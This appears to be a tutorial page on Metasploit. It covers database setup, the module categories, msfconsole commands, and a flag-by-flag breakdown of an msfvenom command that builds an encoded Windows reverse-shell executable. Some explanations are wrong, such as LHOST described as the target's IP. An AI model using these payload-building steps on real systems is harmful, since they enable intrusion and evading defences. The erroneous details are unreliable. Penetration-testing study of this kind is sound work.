Metasploit
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Setting up database
The database in metasploit is used to store output. Postgres comes pre-installed on Kali. The commands for the database are:
msfdb init - Start and intialize the db
msfdb reinit - Delete and reinitialize the database
msfdb delete - Delete database and stop using it
msfdb start - Start the database
msfdb stop - Stop the database
msfdb status - Check service status
msfdb run - Start the database and run msfconsole
For now to start the database we want to reinit so all data is deleted and the database is restarted
Afterwards run the msfconsole so we can check the status of the database
Modules
Metasploit comes with many modules pre-installed. The modules are categorized under:
Auxilliary - Contains alternate exploits and enumeration scripts
Encoders - Contains encoders that assist in encoding payloads
Evasion - Contains scripts that help evade defender software
Exploits - Organized into folders based on device then exploit.
NOPS - Cardinal operations
Payloads - Categorized into Singles, Stagers, and Stages
Post - Post exploitation modules
MSF Venom
MSFVenom is a metasploit standalone payload generator. You can use MsFVenom on it's own to specify a framework, encoder, executable format, etc.. to be used.
To generate a payload with the msfvenom command:
Let's break down what's going on in the command:
msfvenom: Calling the msfvenom generator
-p windows/shell_reverse_tcp: The P is the payload flag, and the string is the payload name
LHOST: The host IP of the target system.
LPORT: The specified port of the target system. Default is 4444.
-a x86: Architecture specification.
-f exe: Format of the payload. In this case a .exe executable.
-b "\x00": Removal of bad ( null ) character bytes.
-e x86/shikata_ga_nai: The encoder.
> payload.exe: The output file name for the payload.
Encoders
The encoder can be ran multiple times on the same payload using the -i { iteration number}
command. This runs the payload through 3 iterations of the encoder increasing it's size but also it's encoded strength.
MSFCONSOLE
Searching
You can use the extensive search queries in msfconsole to find whatever you're looking for. The search command looks like search <string> type:exploit
.
Use
When you find a program you'd like to utilize, you can run the use command to load the program: use <program name>
.
While inside an exploit you can use the show options
command to determine what configuration needs to be set up.
Set
While an exploit is loaded you can use the set <option> <value>
command to set the configuration options.
Unset
The reverse as Set. To unload a config use the unset <option>
command.
Run
To run the exploit use the run
command.
Sessions
Use the sessions -l
command to view any active sessions.
Back
To back out of using an exploit type the back
command to be brought back to the menu.
Port Scanning
Port scanning through msfconsole is very similar to running the nmap tool.
The difference is the results are stored in the database and commands can be run to retrieve specific results.
You can find alternative port scanners for specific scans by using search search portscan
.
Last updated